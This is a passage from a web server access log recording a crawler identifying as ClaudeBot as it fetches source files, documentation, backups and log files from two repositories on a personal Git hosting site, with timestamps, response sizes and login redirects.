216.73.216.188] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 15187] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11669] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 216.73.216.188] [Length 11227] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 11524] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 216.73.216.188] [Length 11211] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css" [Client 216.73.216.188] [Length 10112] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 216.73.216.188] [Length 11190] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 216.73.216.188] [Length 11207] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15586] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 10237] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css" [Client 216.73.216.188] [Length 10103] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16486] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11982] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15577] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 216.73.216.188] [Length 11088] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11366] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13941] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14214] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13892] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js" [Client 216.73.216.188] [Length 10521] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 216.73.216.188] [Length 11207] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 96914] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11320] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16480] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13938] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13887] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10941] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14211] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-4_error.log" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-3_error.log" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 12765] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14666] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" [Client 216.73.216.188] [Length 9861] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json?display=source" [Client 216.73.216.188] [Length 11722] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-2_error.log" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json?display=source" [Client 216.73.216.188] [Length 11716] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:23 +0000] - 